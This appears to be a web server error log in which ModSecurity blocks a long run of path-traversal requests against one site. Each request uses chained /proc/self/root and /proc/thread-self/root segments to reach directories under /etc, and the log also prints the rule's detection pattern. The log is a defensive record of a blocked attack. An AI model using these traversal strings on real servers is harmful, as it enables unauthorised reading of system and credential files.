[Wed Mar 18 10:27:50.282317 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:60306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoVuw_le52K8_3pV3cZgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:53.742010 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:60310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoWew_le52K8_3pV3caAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:55.118180 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:60322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoW-yqAr6etmhZHNq8VgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:57.495087 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:60328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoXdY0UrI5A3LftIyj1QAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:27:58.793309 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:60342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoXgkwaGbbGflqUZAM8QAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:01.279612 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:56512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoYew_le52K8_3pV3cawAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:02.718942 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:56522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoYgkwaGbbGflqUZAM8wAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:05.173662 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:56534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoZew_le52K8_3pV3cbQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:10.467430 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:56540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoauw_le52K8_3pV3ccgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:11.809457 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:33528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoa-yqAr6etmhZHNq8YgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:14.591152 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:33530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqobvu8EFLIOrSqIpsBRAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:22.164468 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:33544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqodkzinOy1jxa1j4cSXQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:26.648645 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:54142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoetY0UrI5A3LftIyj8AAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:27.970995 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:54156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoe9a6ubjKNq_cu4aWIwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:31.163378 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.244.43:57036] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqof-yqAr6etmhZHNq8bQAAAE4"]
[Wed Mar 18 10:28:31.397196 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:54164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqof-yqAr6etmhZHNq8bgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:32.474779 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.228.61:59398] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqogMdf6f5d65gmYZTSagAAAsA"]
[Wed Mar 18 10:28:34.483255 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:57404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqogsdf6f5d65gmYZTSbwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:35.899003 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:57410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqog8df6f5d65gmYZTScAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:41.394947 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:57422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoidY0UrI5A3LftIyj9gAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:42.739454 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:45956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqoiuoXxyEfFpUF8f9rCAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:28:44.158666 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:45972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqojNa6ubjKNq_cu4aWNwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
